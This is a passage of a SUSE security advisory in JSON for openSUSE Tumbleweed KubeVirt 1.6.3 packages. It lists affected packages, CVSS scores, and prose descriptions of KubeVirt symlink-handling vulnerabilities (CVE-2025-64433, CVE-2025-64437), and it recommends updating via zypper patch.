"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-26T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-22872"
},
{
"cve": "CVE-2025-64433",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64433"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, a vulnerability was discovered that allows a VM to read arbitrary files from the virt-launcher pod\u0027s file system. This issue stems from improper symlink handling when mounting PVC disks into a VM. Specifically, if a malicious user has full or partial control over the contents of a PVC, they can create a symbolic link that points to a file within the virt-launcher pod\u0027s file system. Since libvirt can treat regular files as block devices, any file on the pod\u0027s file system that is symlinked in this way can be mounted into the VM and subsequently read. Although a security mechanism exists where VMs are executed as an unprivileged user with UID 107 inside the virt-launcher container, limiting the scope of accessible resources, this restriction is bypassed due to a second vulnerability. The latter causes the ownership of any file intended for mounting to be changed to the unprivileged user with UID 107 prior to mounting. As a result, an attacker can gain access to and read arbitrary files located within the virt-launcher pod\u0027s file system or on a mounted PVC from within the guest VM. This vulnerability is fixed in 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64433",
"url": "https://www.suse.com/security/cve/CVE-2025-64433"
},
{
"category": "external",
"summary": "SUSE Bug 1253185 for CVE-2025-64433",
"url": "https://bugzilla.suse.com/1253185"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-26T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-64433"
},
{
"cve": "CVE-2025-64437",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64437"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. In versions before 1.5.3 and 1.6.1, the virt-handler does not verify whether the launcher-sock is a symlink or a regular file. This oversight can be exploited, for example, to change the ownership of arbitrary files on the host node to the unprivileged user with UID 107 (the same user used by virt-launcher) thus, compromising the CIA (Confidentiality, Integrity and Availability) of data on the host. To successfully exploit this vulnerability, an attacker should be in control of the file system of the virt-launcher pod. This vulnerability is fixed in 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.s390x",
